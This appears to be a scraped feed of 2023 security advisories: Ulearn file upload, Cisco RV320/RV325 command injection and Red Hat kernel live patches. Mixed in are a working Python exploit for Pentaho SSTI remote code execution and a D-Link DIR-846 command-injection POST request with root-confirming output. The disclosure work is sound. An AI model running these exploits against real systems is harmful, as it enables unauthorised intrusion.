Ulearn version a5a7ca20de859051ea0470542844980a66dfc05d allows an attacker with administrator permissions to obtain remote code execution on the server through the image upload functionality. This occurs because the application does not validate that the uploaded image is actually an image.

**Summary**

**Name**

Ulearn a5a7ca20de859051ea0470542844980a66dfc05d - RCE

**Code name**

Scott

**Product**

Ulearn

**Affected versions**

a5a7ca20de859051ea0470542844980a66dfc05d

**State**

Public

**Release Date**

2023-04-10

**Vulnerability**

**Kind**

Insecure file upload

**Rule**

027\. Insecure file upload

**Remote**

Yes

**CVSSv3 Vector**

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CVSSv3 Base Score**

9.1

**Exploit available**

No

**CVE ID(s)**

CVE-2023-0670

**Description**

Ulearn version a5a7ca20de859051ea0470542844980a66dfc05d allows an attacker with administrator permissions to obtain remote code execution on the server through the image upload functionality. This occurs because the application does not validate that the uploaded image is actually an image.

**Vulnerability**

This vulnerability This occurs because the application does not validate that the uploaded image is actually an image.

**Evidence of exploitation**

To exploit this vulnerability, we only need to send the following malicious PHP code to the server.

**Our security policy**

We have reserved the ID CVE-2023-0670 to refer to this issue from now on.

*   https://fluidattacks.com/advisories/policy/

**System Information**

*   Version: Ulearn a5a7ca20de859051ea0470542844980a66dfc05d
    
*   Operating System: GNU/Linux
    

**Mitigation**

There is currently no patch available for this vulnerability.

**Credits**

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

**References**

**Vendor page** https://github.com/ulearnpro/ulearn/

**Timeline**

2023-02-03

Vulnerability discovered.

2023-02-03

Vendor contacted.

2023-02-03

Vendor replied acknowledging the report.

2023-04-10

Public Disclosure.

CVE-2023-0670: Ulearn a5a7ca20de859051ea0470542844980a66dfc05d - RCE | Advisories | Fluid Attacks

Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker to inject and execute arbitrary commands on the underlying operating system of an affected device. These vulnerabilities are due to insufficient validation of user-supplied input. An attacker could exploit these vulnerabilities by sending malicious input to an affected device. A successful exploit could allow the attacker to execute arbitrary commands as the root user on the underlying Linux operating system of the affected device. To exploit these vulnerabilities, an attacker would need to have valid Administrator credentials on the affected device. Cisco has not released software updates to address these vulnerabilities. 

**

Summary

**

*   Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker to inject and execute arbitrary commands on the underlying operating system of an affected device.
    
    These vulnerabilities are due to insufficient validation of user-supplied input. An attacker could exploit these vulnerabilities by sending malicious input to an affected device. A successful exploit could allow the attacker to execute arbitrary commands as the _root_ user on the underlying Linux operating system of the affected device. To exploit these vulnerabilities, an attacker would need to have valid _Administrator_ credentials on the affected device.
    
    Cisco has not released software updates to address these vulnerabilities. There are no workarounds that address these vulnerabilities.
    
    This advisory is available at the following link:  
    https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv32x-cmdinject-cKQsZpxL
    

**

Affected Products

**

*   These vulnerabilities affect Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers.
    
    Only products listed in the Vulnerable Products section of this advisory are known to be affected by these vulnerabilities.
    
    Cisco has confirmed that these vulnerabilities do not affect the following Cisco Small Business Routers:
    
    *   RV016 Multi-WAN VPN Routers
    *   RV042 Dual WAN VPN Routers
    *   RV042G Dual Gigabit WAN VPN Routers
    *   RV082 Dual WAN VPN Routers
    *   RV160 VPN Routers
    *   RV160W Wireless-AC VPN Routers
    *   RV260 VPN Routers
    *   RV260P VPN Routers with PoE
    *   RV260W Wireless-AC VPN Routers
    *   RV340 Dual WAN Gigabit VPN Routers
    *   RV340W Dual WAN Gigabit Wireless-AC VPN Routers
    *   RV345 Dual WAN Gigabit VPN Routers
    *   RV345P Dual WAN Gigabit PoE VPN Routers
    

**

Workarounds

**

*   There are no workarounds that address these vulnerabilities.
    
    If the Remote Management feature is enabled, Cisco recommends disabling it to reduce exposure to these vulnerabilities. The feature is disabled by default.
    
    To determine the setting of the Remote Management feature, choose **Firewall > General** and review the status of the **Remote Management** check box. If **Remote Management** is enabled, uncheck the check box. This will disable the web-based management interface on the WAN IP address, which is reachable through the WAN ports to the internet. The web-based management interface will continue to be available on the LAN IP address, which is reachable through the LAN ports.
    
    While this mitigation has been deployed and was proven successful in a test environment, customers should determine the applicability and effectiveness in their own environment and under their own use conditions. Customers should be aware that any workaround or mitigation that is implemented may negatively impact the functionality or performance of their network based on intrinsic customer deployment scenarios and limitations. Customers should not deploy any workarounds or mitigations before first evaluating the applicability to their own environment and any impact to such environment.
    

**

Fixed Software

**

*   Cisco has not released and will not release software updates to address the vulnerabilities described in this advisory.
    
    Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers have entered the end-of-life process. Customers are advised to refer to the end-of-life notices for these products:
    
    End-of-Sale and End-of-Life Announcement for the Cisco RV320 and RV325 Dual Gigabit WAN VPN Router
    
    When considering a device migration, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page, to determine exposure and a complete upgrade solution.
    
    In all cases, customers should ensure that the new products will be sufficient for their network needs, that the new devices contain sufficient memory, and that current hardware and software configurations will continue to be supported properly by the new product. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.
    

**

Exploitation and Public Announcements

**

*   The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.
    

**

Source

**

*   Cisco would like to thank Wu Yuze and Wang Jincheng for reporting CVE-2023-20117.
    
    Cisco would like to thank Wang Jincheng from X1cT34m Laboratory of Nanjing University of Posts and Telecommunications for reporting CVE-2023-20128.
    

**

Cisco Security Vulnerability Policy

**

*   To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy. This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco.
    

**

Related to This Advisory

**

**

URL

**

**

Revision History

**

*   Version
    
    Description
    
    Section
    
    Status
    
    Date
    
    1.0
    
    Initial public release.
    
    \-
    
    Final
    
    2023-APR-05
    
    Show Less
    

**

Legal Disclaimer

**

*   THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.
    
    A standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products.
    

**

Feedback

**

CVE-2023-20128: Cisco Security Advisory: Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers Command Injection Vulnerabilities

Red Hat Security Advisory 2023-1660-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1660-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1660  
Issue date:        2023-04-05  
CVE Names:         CVE-2023-0266 CVE-2023-0386   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.6) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

* kernel: FUSE filesystem low-privileged user privileges escalation  
(CVE-2023-0386)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2159505 - CVE-2023-0386 kernel: FUSE filesystem low-privileged user privileges escalation  
2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
kpatch-patch-4_18_0-372_26_1-1-6.el8_6.src.rpm  
kpatch-patch-4_18_0-372_32_1-1-5.el8_6.src.rpm  
kpatch-patch-4_18_0-372_36_1-1-4.el8_6.src.rpm  
kpatch-patch-4_18_0-372_40_1-1-4.el8_6.src.rpm  
kpatch-patch-4_18_0-372_41_1-1-3.el8_6.src.rpm  
kpatch-patch-4_18_0-372_46_1-1-1.el8_6.src.rpm

ppc64le:  
kpatch-patch-4_18_0-372_26_1-1-6.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_26_1-debuginfo-1-6.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_26_1-debugsource-1-6.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_32_1-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_32_1-debuginfo-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_32_1-debugsource-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_36_1-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_36_1-debuginfo-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_36_1-debugsource-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_40_1-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_40_1-debuginfo-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_40_1-debugsource-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_41_1-1-3.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_41_1-debuginfo-1-3.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_41_1-debugsource-1-3.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_46_1-1-1.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_46_1-debuginfo-1-1.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_46_1-debugsource-1-1.el8_6.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-372_26_1-1-6.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_26_1-debuginfo-1-6.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_26_1-debugsource-1-6.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_32_1-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_32_1-debuginfo-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_32_1-debugsource-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_36_1-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_36_1-debuginfo-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_36_1-debugsource-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_40_1-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_40_1-debuginfo-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_40_1-debugsource-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_41_1-1-3.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_41_1-debuginfo-1-3.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_41_1-debugsource-1-3.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_46_1-1-1.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_46_1-debuginfo-1-1.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_46_1-debugsource-1-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/cve/CVE-2023-0386  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZC2QfNzjgjWX9erEAQgNNg/9Eho8CXtXoHqZQdLrGhk/KvGhNdZ75hDt  
nARC7hATfax98FiwvYMvEcL9ZdBGzrxcsd9yXmE+TT8pKlu2x2AX10Y8EAKg76GX  
YSWS6YpVHmrxi2pV7w5WjPqY+Xz7pbTxhCqXxJF6AeiaDgpq29N8XxlIwy12VNey  
N6RuS9pUQ9JjuE3RnxYdWUD1AzHFjM9OZsSs1jEJr9RLKzoYHuo9SD+Md7PAyaba  
ifrzTxNOcAfbZME1O30dObcKgJM10No4gTvxrwA7V6ZSHMNl9qn9mtKFdGrqnl70  
RHXL4NkeJJJ2yDw9SEqQevc/tPfP2rqEenn35UK6smANdXNL2OQ1GLXnCu+rF6e9  
KOltIkQJ+ypYU5ot5g6KsvlCB4vXJ1FJe5aBAhHrKpuQds7IkyNoy9mPoIs/Mjen  
bS2dX7AsI3uT28qxkrsEQRGS9Okh2FsMQjjLe+f0KeerxA8e5feVJBRUS42Schab  
TTw2NU5W+sfRa20kDcm/fkt/7Ft8qFRnUHqAbJTlvvepL8hodl2RtU0eymACVk0T  
kTRK44aoZJFbLAbTuiQHFlDTnWi+0O2PoFga5l5XhbF/9zc6hk29rR0hM1BbcHje  
LBWtNTttvPBwBg5hv1/VvCniiIVMPYvcRYg5RDAA3knXd5IEtOats4UBTTxnVg0W  
sQWzQbcINb0=  
=plbD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1660-01

Pentaho BA Server EE version 9.3.0.0-428 suffers from a remote code execution vulnerability via a server-side template injection flaw.

**Pentaho BA Server EE 9.3.0.0-428 Server-Side Template Injection / Remote Code Execution**

    # Title: Pentaho BA Server EE 9.3.0.0-428 - RCE via Server-Side Template Injection (Unauthenticated)# Author: dwbzn# Date: 2022-04-04# Vendor: https://www.hitachivantara.com/# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html# Version: Pentaho BA Server 9.3.0.0-428# CVE: CVE-2022-43769, CVE-2022-43939# Tested on: Windows 11# Credits: https://research.aurainfosec.io/pentest/pentah0wnage# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)import requestsimport argparseparser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)args = parser.parse_args()url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a"print ("running...")r = requests.get(url)if r.text == 'false':    print ("command should've executed! nice.")else:    print ("didn't work. sadge...")

Pentaho BA Server EE 9.3.0.0-428 Server-Side Template Injection / Remote Code Execution

Red Hat Security Advisory 2023-1662-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1662-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1662  
Issue date:        2023-04-05  
CVE Names:         CVE-2023-0266 CVE-2023-0461   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.4 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.4) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

* kernel: net/ulp: use-after-free in listening ULP sockets (CVE-2023-0461)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
2176192 - CVE-2023-0461 kernel: net/ulp: use-after-free in listening ULP sockets

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.4):

Source:  
kpatch-patch-4_18_0-305_65_1-1-5.el8_4.src.rpm  
kpatch-patch-4_18_0-305_71_1-1-4.el8_4.src.rpm  
kpatch-patch-4_18_0-305_72_1-1-3.el8_4.src.rpm  
kpatch-patch-4_18_0-305_76_1-1-2.el8_4.src.rpm  
kpatch-patch-4_18_0-305_82_1-1-1.el8_4.src.rpm

ppc64le:  
kpatch-patch-4_18_0-305_65_1-1-5.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_65_1-debuginfo-1-5.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_65_1-debugsource-1-5.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_71_1-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_71_1-debuginfo-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_71_1-debugsource-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_72_1-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_72_1-debuginfo-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_72_1-debugsource-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-debuginfo-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-debugsource-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_82_1-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_82_1-debuginfo-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_82_1-debugsource-1-1.el8_4.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-305_65_1-1-5.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_65_1-debuginfo-1-5.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_65_1-debugsource-1-5.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_71_1-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_71_1-debuginfo-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_71_1-debugsource-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_72_1-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_72_1-debuginfo-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_72_1-debugsource-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-debuginfo-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-debugsource-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_82_1-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_82_1-debuginfo-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_82_1-debugsource-1-1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZC2QfNzjgjWX9erEAQjDDg//eEgJoqhJcHFm5gO0BE3zMQaoc9+bVd5a  
GrZ9j9cpJlpywY8uLTfBCA4pbEKgZEitEY5FMSTwdPjYviOsE5rd7byww9ualHtG  
FDlERdRhnulIfq7wAS0Lb//sCyqNw6rsVE2dTNXxuNLqDCgsZjKBq8S+XF+Ag2wJ  
pBvOYW3a4abK3vbV7beH+syXD39NCJ1m6bhTvLbdxfJHgMjyquz8IeIcVL43rhtq  
nXUce/YJKU2Roz0Iz+NUMEPfXfBny5/jfV+ChMO8Ga/joc1HQPdLSgc42J85tTmv  
m8BIL+iHiVendKY4E5DwTB49ae8CTDIcqPtzY6EVCxwbq0kxHhKsA2Ud+z+ziBQe  
l7p+19eM3OBveLmeHgVOziBUQhVmy2joiWU6iaYYrcon/S8BOKQZQ3AeAAaY5niF  
npBv9or4FbfTWjVDb8R8t3AQSqy54ssmvNjfXeih2QGV9ewyn8JS8Lw3/YOmV5Zu  
1knYj3k+Lvc8GSuZuL2a/yLTyG4J+DwVAaZQpJJzKhZxyEx1tUCCw9VIBakXc9VQ  
j8hpx8GfbShhD+oJGQkUyffmE2Y03+FnsQzNfByjoThnC/rtEvfLk4VSpHZ0qjs6  
F9vNoKhA93+GR0L3h5u6ZMDGEA+NbmmwTMrrBV+fLcMkYGJZDzCKNuRG0jZTL/CF  
S5Hii87MsGw=  
=tQuy  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1662-01

D-Link DIR-846 suffers from a remote command execution vulnerability.

    # Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability # Google Dork: NA# Date: 30/01/2023# Exploit Author: Françoa Taffarel# Vendor Homepage:https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suportehttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip# Software Link:https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip# Version: DIR846enFW100A53DBR-Retail# Tested on: D-LINK DIR-846# CVE : CVE-2022-46552D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remotecommand execution (RCE) vulnerability via the lan(0)_dhcps_staticlistparameter. This vulnerability is exploited via a crafted POST request.### Malicious POST Request```POST /HNAP1/ HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101Firefox/107.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/jsonSOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285Content-Length: 171Origin: http://192.168.0.1Connection: closeReferer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7;PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}```### Response```HTTP/1.1 200 OKX-Powered-By: PHP/7.1.9Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-type: text/html; charset=UTF-8Connection: closeDate: Thu, 01 Dec 2022 11:03:54 GMTServer: lighttpd/1.4.35Content-Length: 68{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}```### Data from RCE Request```GET /HNAP1/rce_confirmed HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV;PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1Upgrade-Insecure-Requests: 1```### Response```HTTP/1.1 200 OKContent-Type: application/octet-streamAccept-Ranges: bytesContent-Length: 24Connection: closeDate: Thu, 01 Dec 2022 23:24:28 GMTServer: lighttpd/1.4.35uid=0(root) gid=0(root)```

D-Link DIR-846 Remote Command Execution

Red Hat Security Advisory 2023-1659-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1659-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1659  
Issue date:        2023-04-05  
CVE Names:         CVE-2022-4378 CVE-2023-0266 CVE-2023-0386   
                   CVE-2023-1476   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

* kernel: FUSE filesystem low-privileged user privileges escalation  
(CVE-2023-0386)

* kpatch: mm/mremap.c: incomplete fix for CVE-2022-41222 (CVE-2023-1476)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
2159505 - CVE-2023-0386 kernel: FUSE filesystem low-privileged user privileges escalation  
2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
2176035 - CVE-2023-1476 kpatch: mm/mremap.c: incomplete fix for CVE-2022-41222

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
kpatch-patch-4_18_0-425_10_1-1-4.el8_7.src.rpm  
kpatch-patch-4_18_0-425_13_1-1-2.el8_7.src.rpm  
kpatch-patch-4_18_0-425_3_1-1-6.el8.src.rpm

ppc64le:  
kpatch-patch-4_18_0-425_10_1-1-4.el8_7.ppc64le.rpm  
kpatch-patch-4_18_0-425_10_1-debuginfo-1-4.el8_7.ppc64le.rpm  
kpatch-patch-4_18_0-425_10_1-debugsource-1-4.el8_7.ppc64le.rpm  
kpatch-patch-4_18_0-425_13_1-1-2.el8_7.ppc64le.rpm  
kpatch-patch-4_18_0-425_13_1-debuginfo-1-2.el8_7.ppc64le.rpm  
kpatch-patch-4_18_0-425_13_1-debugsource-1-2.el8_7.ppc64le.rpm  
kpatch-patch-4_18_0-425_3_1-1-6.el8.ppc64le.rpm  
kpatch-patch-4_18_0-425_3_1-debuginfo-1-6.el8.ppc64le.rpm  
kpatch-patch-4_18_0-425_3_1-debugsource-1-6.el8.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-425_10_1-1-4.el8_7.x86_64.rpm  
kpatch-patch-4_18_0-425_10_1-debuginfo-1-4.el8_7.x86_64.rpm  
kpatch-patch-4_18_0-425_10_1-debugsource-1-4.el8_7.x86_64.rpm  
kpatch-patch-4_18_0-425_13_1-1-2.el8_7.x86_64.rpm  
kpatch-patch-4_18_0-425_13_1-debuginfo-1-2.el8_7.x86_64.rpm  
kpatch-patch-4_18_0-425_13_1-debugsource-1-2.el8_7.x86_64.rpm  
kpatch-patch-4_18_0-425_3_1-1-6.el8.x86_64.rpm  
kpatch-patch-4_18_0-425_3_1-debuginfo-1-6.el8.x86_64.rpm  
kpatch-patch-4_18_0-425_3_1-debugsource-1-6.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/cve/CVE-2023-0386  
https://access.redhat.com/security/cve/CVE-2023-1476  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

